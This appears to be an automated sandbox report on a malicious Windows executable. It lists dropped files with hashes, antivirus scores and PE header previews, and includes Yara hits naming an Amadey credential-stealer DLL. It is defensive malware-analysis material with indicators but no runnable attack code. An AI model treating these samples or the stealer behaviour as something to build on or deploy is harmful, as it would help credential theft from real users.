                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L.....a................."....D......H.......@....@...........................F..............................................'..(....pC.xC....................E......................................,..@............................................text...f .......".................. ..`.data....)B..@...(...&..............@....rsrc...xC...pC..D...N..............@..@.reloc...B....E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1235912
                                                                                                                                                                      Entropy (8bit):7.847488370221355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:tpoG1/LlgEyH9QhH0slclslX6ptmEh4NqYJUo02O7RVUCshnSVjGMY0tZ8bMyqZs:tpocLlac0s5Ih4Ny/Ybb
                                                                                                                                                                      MD5:F96144B1D5B53D93CAADDDADE38DB5E9
                                                                                                                                                                      SHA1:1587E66F9A4D83060EE597F983A7323A556BC1C0
                                                                                                                                                                      SHA-256:63018F38311387AA7F511F090FD154EA6EC3799C2F4762890082793912C68146
                                                                                                                                                                      SHA-512:824A86438150DF143C7475605600B4A03DBFA819806F193BE248650A3A70E97BDCD3D20CAC9B8B00693D464B5CBD168E1F0C78BEAA00D167B8A877CFBCE3C34C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..{..M{..M{..M..fMg..M..SMi..M..gM...Mr.^Mr..M{..M&..M..bMy..M..WMz..M{.ZM}..M..PMz..MRich{..M................PE..L...O.wc.................X..........mk.......p....@.......................... ..................................................d........3...........................................................................p..\............................text....V.......X.................. ..`.rdata...%...p...&...\..............@..@.data...,5..........................@....rsrc....3.......4..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3188224
                                                                                                                                                                      Entropy (8bit):7.964888519163398
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:9R5aeXkEIsmuDvFmvNtLmVLF5HLiBrvpPFI:9Dv5lJz4v3LMLiBrh2
                                                                                                                                                                      MD5:44A7E13ECC55CE9797C5121B230D9927
                                                                                                                                                                      SHA1:B99F1D86E6D9C7E0D694CA605ABD205663278487
                                                                                                                                                                      SHA-256:9E0425E14520485FA7E86057D07D26E8064F99A7AD09E35211EDD4A428EE57AE
                                                                                                                                                                      SHA-512:74DF06B20D23483F854B5A88E5CCDFE534497630A105614E6CD87F3238398E0FB03218CB864FD6F7798B69E083C1098225010AECD959FBEC28D63C0626711A9F
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}!...O...O...O..wL...O..wK...O..wJ.e.O..wN...O...N..O.fK...O.fL...O.fJ..O.fJ...O.fM...O.Rich..O.................PE..d....0xc..........".... .6..........4..........@..............................1...........`..................................................^..(.............0.$$............0.(...P)...............................(..@............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data....6-..p... -..T..............@....pdata..$$....0..&...t0.............@..@_RDATA..\.....0.......0.............@..@.reloc..(.....0.......0.............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):342528
                                                                                                                                                                      Entropy (8bit):6.812640405950158
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:CV8MTz4fnz5/zNOCVmcUh+3oQ9gOU+fzYBb6:bMYfz5smmM9gT6
                                                                                                                                                                      MD5:19A79DADDFAAC09499E79ADE27E756F8
                                                                                                                                                                      SHA1:6BFD114AF2D1A68C4724961C6E761373EFE66C52
                                                                                                                                                                      SHA-256:3F2EA3CA90B2DF0D2A93DF0E4328F58077A5BDBB97B2DFFE81B589C057F93216
                                                                                                                                                                      SHA-512:AEA9D6CF93EB6ADA5D895C70DA8CBF4CA56BEB1125FC33961E112DCBAEA122F82DD4CBC9FE241DDCC5F5EBC6A71F83B03BEAF645F3A6E2724ACB03E7D61007A3
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.,.?iB.?iB.?iB.!;..iB.!;.,iB.!;..AiB...9.<iB.?iC.FiB.!;.>iB.!;.>iB.!;.>iB.Rich?iB.........PE..L....^Na................. ....D......H.......0....@..........................pE......!......................................t%..(.....B..A................... E..................................... -..@............................................text...V........ .................. ..`.data.....A..0.......$..............@....rsrc....A....B..B..................@..@.reloc...A... E..B..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):360448
                                                                                                                                                                      Entropy (8bit):7.386873779597766
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:b2GSJmjsOF3L5n8qcXE63miXHB0rtlC0VAin2iuu5hxIpSjgOi6ziFB:CGSUogb5n8q68t/VMu5XQSMGu
                                                                                                                                                                      MD5:28A6112DCB54CE6886F7D9ACB8A15E31
                                                                                                                                                                      SHA1:432B6AF51096CD77D667F79B2CF89F5DD37FA748
                                                                                                                                                                      SHA-256:B35656FEA1C887375414AFA04BDF2DD240541F215D01B4E6B0DACC4BA8ECC73C
                                                                                                                                                                      SHA-512:BA86E0832339E33F13BD4F148C7616DE36BBC4A142AB42C7193212A069E5F179E6191368D5AEBFDA74C6AE6DA2606A1E36C2DDF531F38F85EAE589C3462302E0
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}...................................Q......................................Rich....................PE..L....xc.................B...H......P........`....@.................................(..........................................(.......(............................................................................`..@............................text....A.......B.................. ..`.rdata...H...`...J...F..............@..@.data...8...........................@....rsrc...(............x..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):228864
                                                                                                                                                                      Entropy (8bit):4.207192388303838
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:w6qNKWPdNWepOzb3OdC9E4/hUYcgvqytNIxYcW9yz:uVvWepYb+dmugvntaxw9
                                                                                                                                                                      MD5:730A7A6F235525238EE33A2C046C2BA7
                                                                                                                                                                      SHA1:DAA1B8E97D23B32B99B4B230DE9608FF1BCD5BF7
                                                                                                                                                                      SHA-256:4F24670DB3AA4D4DB6CED0A59AAEA20D9B784C69E181468905DB4D559FB6AFE1
                                                                                                                                                                      SHA-512:D97C53CEA4E2FB99BC3DD44E139D3F331251A68F085C980EBA5E8D76D5124195E2FF8958A297CFC9D0500EC90908A45CF6E76603A0040D504B8BF524AE7A9F0E
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....vc................................. ........@.. ...............................h....@.....................................S.......H............................................................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc...............|..............@..B........................H............$......)....................................................0..Y.......(........% ....TF........ ....Z........ ....Z.... ............. ............. ............. .........%...................................... ....;................F........ ....X........ ....?........ ....=.... ........?d... ........=....8{... ........?.... ........=....8....8.... ........?.... ........=....8....8|...8w... ........?>... ........=....8.... ........?.... ........=....80...80...8+
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):82823
                                                                                                                                                                      Entropy (8bit):7.894936066768262
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:CJIA2DzHu++Bp1Xfcj6pnUh0kn9MsMRGnauvp48ePCH5ViZEylibB:r3H1CvPcjCUh1nPauvXegcuek
                                                                                                                                                                      MD5:BC42901C6E0D67944F7136A6CF75D87F
                                                                                                                                                                      SHA1:79B7FE4111C298B32D52C6A635F176E93FC2562C
                                                                                                                                                                      SHA-256:1BA5179353D7E9C3831D1DEEDED3FC01332E5A0BFE21267C5DC941A27E619193
                                                                                                                                                                      SHA-512:F4C4897CB90653854649065A15D307A5DB7DF838C04DD7940501CC9D21451AC70269E79C99A72A8853BCD8FA430D90D9826B6332AD35517DA320DD07D674E679
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W....Q..G.Z5..$....i_.S...'..9'.j...............;...d..;..F......r..!vV.s......xg.?.w.....q.....X.v?...Gp*.T...6..&.ZJ.i(....R..!....a._.....4."4h.d.J..=.e%.v8.'dy.-}E...G....u...MI...G.?..w...MY.h..|.E{..>...
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):341006
                                                                                                                                                                      Entropy (8bit):7.632238569480827
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:mYCc3GK5cRKFKT0Am1GaDgj9cBtrttZbzT1+Iq0UMNpBfO/6kjDt/JwrkgdxEy:mA3GKiRzTLQWKBtrzdpx/u6kBJwvjz
                                                                                                                                                                      MD5:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                      SHA1:C2444E21CC72BFC1CD74197E327323EB2E3E3815
                                                                                                                                                                      SHA-256:D0A4986CEA15C050DEE854CCD21CFF84179A950A70FAEC28526C7AEBD25A0970
                                                                                                                                                                      SHA-512:BFA09A46DACD3138448A93782229B24993F47F6EF6C7B283B55A32E056BB76DC63F043FC4BB64D57F49FB6D5B3A97551B55EC0363B2F7DF3193E5144F85A3A50
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=Y.S..S..S......S...W..S...P..S...V...S...R..S...R..S..R...S._.V..S._....S._.Q..S.Rich.S.........................PE..L....uxc...............".j...<......+m............@.................................A.....@.............................................................................8...............................@............................................text....i.......j.................. ..`.rdata...%.......&...n..............@..@.data...P...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):341006
                                                                                                                                                                      Entropy (8bit):7.632238569480827
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:mYCc3GK5cRKFKT0Am1GaDgj9cBtrttZbzT1+Iq0UMNpBfO/6kjDt/JwrkgdxEy:mA3GKiRzTLQWKBtrzdpx/u6kBJwvjz
                                                                                                                                                                      MD5:F46063253FF38E6B2452BF4410C5FEC0
                                                                                                                                                                      SHA1:C2444E21CC72BFC1CD74197E327323EB2E3E3815
                                                                                                                                                                      SHA-256:D0A4986CEA15C050DEE854CCD21CFF84179A950A70FAEC28526C7AEBD25A0970
                                                                                                                                                                      SHA-512:BFA09A46DACD3138448A93782229B24993F47F6EF6C7B283B55A32E056BB76DC63F043FC4BB64D57F49FB6D5B3A97551B55EC0363B2F7DF3193E5144F85A3A50
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=Y.S..S..S......S...W..S...P..S...V...S...R..S...R..S..R...S._.V..S._....S._.Q..S.Rich.S.........................PE..L....uxc...............".j...<......+m............@.................................A.....@.............................................................................8...............................@............................................text....i.......j.................. ..`.rdata...%.......&...n..............@..@.data...P...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\3790.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):382464
                                                                                                                                                                      Entropy (8bit):6.969580968654444
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:O3eRNpLX3EJscap6Hi+RtWce2vjacYJdjpPnFwCLLObfwB:9NtUJsP0jVerxqC3O
                                                                                                                                                                      MD5:5E08968D858224A33175069D64DC7F39
                                                                                                                                                                      SHA1:8D18D2E867205BA9D0F42DB569C335609FDC1752
                                                                                                                                                                      SHA-256:9329CAC20692208A720E6565B51F2492FFAE539FF9B2AD469D6FAC8FDA061C87
                                                                                                                                                                      SHA-512:06D08EC2C2352AA7DFCD97F6E3691EFC1AF91CB1409543566D5D4E230D2665DB6F5C820F28D88519D6D888852FAD3B4725E32D36F9ACA3577554D6DCFED1613C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L.....a................."....D......H.......@....@...........................F..............................................'..(....pC.xC....................E......................................,..@............................................text...f .......".................. ..`.data....)B..@...(...&..............@....rsrc...xC...pC..D...N..............@..@.reloc...B....E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):167936
                                                                                                                                                                      Entropy (8bit):6.1797557233483955
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:IeAGcNNwmlR2GNUbomMYMLnbtoKOmiNL2SJOUOhop:CvNNtWuYcqHmiNLOc
                                                                                                                                                                      MD5:75375C22C72F1BEB76BEA39C22A1ED68
                                                                                                                                                                      SHA1:E1652B058195DB3F5F754B7AB430652AE04A50B8
                                                                                                                                                                      SHA-256:8D9B5190AACE52A1DB1AC73A65EE9999C329157C8E88F61A772433323D6B7A4A
                                                                                                                                                                      SHA-512:1B396E78E189185EEFB8C6058AA7E6DFE1B8F2DFF8BABFE4FFBEE93805467BF45760EEA6EFB8D9BB2040D0EAA56841D457B1976DCFE13ED67931ADE01419F55A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R.D.3...3...3...,...3...3...3.../...3.......3.../...3.......3..Rich.3..........................PE..L...P.#B............................xH............@.........................................................................07..P....................................................................................................................text............................... ..`.rdata...a.......p..................@..@.data....b...P...@...P..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1019991
                                                                                                                                                                      Entropy (8bit):7.9981268397514125
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:24576:I8QnhcAisyibvw8QJTTRz+oH7OgXwWpiubynw7ynLbzCQ:Itns7GY1XSsOQfE/7bzCQ
                                                                                                                                                                      MD5:9E73FB50D37E37EE8BD19A8E3D2B82CA
                                                                                                                                                                      SHA1:3DB1C548E86E4BB7457324A3097B05DA15B7FFC3
                                                                                                                                                                      SHA-256:68BA7122EE8D9CE34ED94B6036A171CE38D6D9D9B3A609C2F4DE773F4DD40D5C
                                                                                                                                                                      SHA-512:B41209300F018103B0F8A4DE0537F348A3BDFCBC8FEB19E7FEC6634B06C266CC442145FD2D9230F827F273B0D07BB6BBCAB7A0F0E9E1F558E6DD7A076F568094
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:PK.........e.K...yq1...@......7zxa.dll...x......d'.,.b.X%j....5.Q.7.....l.d.B.m%.)mi...$.6.2..b_...R}k[....FK...l"..O...FE.uC...02.9.../.?...=..<.......{...k.g.8N.?]....sr.....)W.0.{v.k.:.E..*..g]....~..k.......J.__.Q/.'..d......w.^}...).X.u..7..N........Y...i.....J........i.mi30..*Mo.........i...D.GR~@.....}.....X......E|.w.,...q7.J.0.U...,....<..}O`p.'...L..f..........PT.%..b`s..;..............|I......<?}%./.06M......I_.8G^.....g.Fp.y.K.=..3&..$.O..a....V.6..8.]..._W...j:..g....9o._....R.+.2x^3!.<.......kv..S.u.f..L.m.......3....=....d.S....Q...~..........A..`...._f?.We.U6.H..D6...dk...4.Z....Q-...............a...^^...uTr...O:x'......uh.)..>"...f.S.l.Rb.}f.m..c.0%Yd...x.W...\....u..^....WZ..z......t+..{.....D....s.ne2....GN.qa.p..7.kD..5......v.C......~.k...f]6....P..%#.%.z.$E.!..>....#.. ......g..YH..7U.0..W.).S.........*.*..^"..([.g.)d....iWc...j.w'....F.'s...M."..={.{s<........}.3..s).|........\~.T..-k..V~....n......
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):129024
                                                                                                                                                                      Entropy (8bit):6.5122035629449355
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:Yx7pOYzBekK3tiINwyP7XSSJds3zhrjPcnqULv4G9:Yx7ZNhK3vwyOztPc3L
                                                                                                                                                                      MD5:507E9DC7B9C42F535B6DF96D79179835
                                                                                                                                                                      SHA1:ACF41FB549750023115F060071AA5CA8C33F249E
                                                                                                                                                                      SHA-256:3B82A0EA49D855327B64073872EBB6B63EEE056E182BE6B1935AA512628252AF
                                                                                                                                                                      SHA-512:70907EC4C395B0D2219BFE98907EC130BFCBC6D4BEC7BD73965A9B1E422553E27DAAEAD3D6647620FCF5392D85A2E975BCE0F7C79C0BC665DD33CE65F7D44302
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: Joe Security
                                                                                                                                                                      • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Author: ditekSHen
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                      • Antivirus: Metadefender, Detection: 71%, Browse
                                                                                                                                                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):160970
                                                                                                                                                                      Entropy (8bit):7.998743190535304
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:JxAURrrQurKPLuV+kPEpzS4yYpCbAlovI5z/uZtuyRMv:JxAUgLmPZtbLmz/stK
                                                                                                                                                                      MD5:100024D016C74F25F89DCFE50C3B3A2F
                                                                                                                                                                      SHA1:23166B8D0D71B01C19B7730F2019E25A103162CA
                                                                                                                                                                      SHA-256:60623FFF9AAEB75C60C93F4D4E71680B868E1D05117695DA75AF0C73360A1C6F
                                                                                                                                                                      SHA-512:9B27BA829BE35ECA8FA57FC3170F7D0A6DB476A41900E7DD6621CB5AF5BF0787BEC2EA1F5332C8B5A9F49ECA644D92CD292733CF72303C51770D41D755B6909F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.}C...x...h..?...lF.>.....5...s.Q.......Hf...]&.f.....#....=L4..c........B..p.......w...t..........~..x*yg.m..k...Y[+...R3.O.,5.....U..s.d.._V.i.JV..s<..dVs..s.9.hV.d..;4..z....T.~.qf.1..x.....p.)..V,]..^..CTX....l\6.!.......2....d.#S..*S(~...-.......h.B..[....qK...UkcT....y.D....Y..)...../F....f>)..........6%..!.]...Z....c..;R...f.wCm..W...Y......1.q;lo.#.2...f..F.>.R..7..H!.^H...<.J...K.&._...b.c.&.*|~.$-.1Kf.R.Gmu....?.'c.I..C....A..C.....}.A.~{.I..%...._v...E..:h%.)W|.. .*gFq.y.@.;~..=.Na..E..G..m..%.;=..j..o+..J...%...6..>'.UHTX......u].w.O.9..z..`..@1.>........)+..sk.....H.w.."..E....&O......a..E}.Q...O.[....GT.'+.wf.!.oy^....C.y...[..}.>.27...LA.. .~....H...b..e..4^..*..b....m...R0........c.......\..t..7M.{..C..I.@..Q..a6.z..S...I^k....j../8..J.}.D.. ..`s..[.P.........<.......K...f...) .......9=.....&... ..T...I[...T.K..o.{%.A.?\WL.#.....j.F...*.8.l.O...?.F..^..~7..L.g..)..W...[..G.b.........".^.h.........i..........+Z.x7..E.B....".c.:$
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):343552
                                                                                                                                                                      Entropy (8bit):6.790900644113691
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:mzE3TFjX0rs2VfUQbgjpPnFwCLLObfwB:jFGNmxqC3O
                                                                                                                                                                      MD5:FFB4CF34B38F126C917E1C1E1D26DF73
                                                                                                                                                                      SHA1:36E558FDB10418AA971AEA3F02D6BA1F4D566ED2
                                                                                                                                                                      SHA-256:4A47FDBB09DD09EA813C0475D32F693CBBDED09B3753DEF43179F91E1A8F8A55
                                                                                                                                                                      SHA-512:E7BA484B42AF0B4FDE10736D7ABD6374145D3808961BEA2A55A2E41C9E5B3C549590E914489E0DC505C5C53C1D1B7071D42892B4458956E5CD4DECBBF1BDE765
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L...oU'a................."....D......H.......@....@..........................pE.....>d.......................................'..(.....B.xC................... E......................................,..@............................................text...f .......".................. ..`.data....A..@.......&..............@....rsrc...xC....B..D..................@..@.reloc..*B... E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Windows\explorer.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                      Process:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):15
                                                                                                                                                                      Entropy (8bit):3.240223928941852
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:o3F:o1
                                                                                                                                                                      MD5:509B054634B6DE74F111C3E646BC80FD
                                                                                                                                                                      SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                                                                                                                                      SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                                                                                                                                      SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:processed dir:
                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):6.790900644113691
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:S2XJ2wbz7u.exe
                                                                                                                                                                      File size:343552
                                                                                                                                                                      MD5:ffb4cf34b38f126c917e1c1e1d26df73
                                                                                                                                                                      SHA1:36e558fdb10418aa971aea3f02d6ba1f4d566ed2
                                                                                                                                                                      SHA256:4a47fdbb09dd09ea813c0475d32f693cbbded09b3753def43179f91e1a8f8a55
                                                                                                                                                                      SHA512:e7ba484b42af0b4fde10736d7abd6374145d3808961bea2a55a2e41c9e5b3c549590e914489e0dc505c5c53c1d1b7071d42892b4458956e5cd4decbbf1bde765
                                                                                                                                                                      SSDEEP:6144:mzE3TFjX0rs2VfUQbgjpPnFwCLLObfwB:jFGNmxqC3O
                                                                                                                                                                      TLSH:3974CF3472B0D4B2F575C670C429CAA5AABCEC213524C9033316FBBF6E30A9D566E275
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x..1x..1x..c...1x..c..!1x..c...1x......1x..1y..1x..c...1x..c...1x..c...1x.Rich.1x.................PE..L...oU'a...........
                                                                                                                                                                      Icon Hash:acfca6b6b69486e2
                                                                                                                                                                      Entrypoint:0x4048a5
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x6127556F [Thu Aug 26 08:48:47 2021 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                      File Version Major:5
                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                      Import Hash:938ae2aaaa8ec1fc2d05063ef7a2e3c5
                                                                                                                                                                      Instruction
                                                                                                                                                                      call 00007FEF60A9B8F3h
                                                                                                                                                                      jmp 00007FEF60A96E4Dh
                                                                                                                                                                      push 00000008h
                                                                                                                                                                      push 00412368h
                                                                                                                                                                      call 00007FEF60A977BAh
                                                                                                                                                                      mov ecx, dword ptr [ebp+08h]
                                                                                                                                                                      test ecx, ecx
                                                                                                                                                                      je 00007FEF60A96FFCh
                                                                                                                                                                      cmp dword ptr [ecx], E06D7363h
                                                                                                                                                                      jne 00007FEF60A96FF4h
